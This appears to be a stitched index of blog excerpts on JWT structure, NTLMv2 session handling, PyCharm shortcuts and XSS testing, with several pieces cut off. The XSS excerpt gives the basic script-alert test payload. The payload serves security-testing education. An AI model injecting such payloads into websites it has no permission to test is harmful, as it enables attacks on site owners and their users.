JWT stands for JSON Web Token. After successful user authentication, the server sends a JWT in the response which can be used to make API calls or to access protected resources. It is typically used in the request header like
Authorization: Bearer JWT
A JWT looks like this and may not make any sense to bare eyes. eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.Yrp55yopmWPtFlRNYKPAXTNgvEPGI7cuDgrBcVBZXzQ
It consists of 3 parts (base64 encoded) separated by dots.
I came across a web application that uses NTLMv2 for authentication. I logged in to the application (provided my credentials for the first time) and opened Chrome developer tool (F12) to check the requests. There was no session cookie or authorization header (Authorization: Negotiate or Authorization: Bearer) in the request. There was no other session-related information to prove that the user was logged in. I was surprised to see that the server still responded with content available only to authenticated users. I wondered how did the server know that I was logged in without any session-related data in the request.
We all use shortcuts to make things convenient and fast. I’ve been using them in different code editors like Eclipse and PyCharm. There are tons of shortcuts to choose from and it’s difficult to remember all of them. I have compiled a list of PyCharm shortcuts that we use frequently. I have carefully chosen only those shortcuts that we use every minute.
Few of the shortcuts are in-built and few of them are user-defined. In user defined shortcuts I have mostly used ‘alt’ key. I felt ‘alt’ key is rarely used in inbuilt shortcuts and it will make for a…
Let us look at various payloads that we should use in different context.
1. Context — body
Payload — <script>alert(‘xss’)</script>
Cross Site Scripting or XSS as it is popularly known, is one of the common vulnerabilities found in web applications. It has firmly retained its spot in the OWASP Top 10 Application Security Risks — 2017. In this post, we discuss about how to test Cross Site Scripting (XSS) vulnerability in web apps. If you want to understand what XSS is, I recommend reading it here.
Typically when we encounter an input field in web page, we go straightaway and insert the most loved XSS payload <script>alert(‘XSS’)</script> to see if we get an alert box like this.